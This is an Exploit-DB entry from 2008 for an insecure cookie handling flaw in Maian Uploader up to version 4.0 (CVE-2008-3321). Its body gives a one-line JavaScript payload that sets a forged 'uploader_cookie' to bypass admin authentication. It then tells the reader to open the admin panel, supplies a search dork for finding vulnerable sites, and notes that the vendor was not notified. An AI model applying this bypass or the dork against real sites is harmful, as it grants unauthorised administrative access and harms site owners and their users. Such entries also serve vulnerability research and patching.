Maian Uploader <= 4.0 Insecure Cookie Handling Vulnerability

2008-07-13T00:00:00
ID EDB-ID:6065
Type exploitdb
Reporter S.W.A.T.
Modified 2008-07-13T00:00:00

Description

Maian Uploader <= 4.0 Insecure Cookie Handling Vulnerability. CVE-2008-3321. Webapps exploit for php platform

                                        
                                            -[*]+================================================================================+[*]-
-[*]+         Maian Uploader &lt;= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Uploader v4.0



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

   Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie

exists.
    and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

    javascript:document.cookie = "uploader_cookie=1; path=/";


[*] NOTE/TIP:

    after running the javascript, visit "/admin/index.php" to view admin area.



-[*]+================================================================================+[*]-
-[*]+         Maian Uploader &lt;= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-07-13]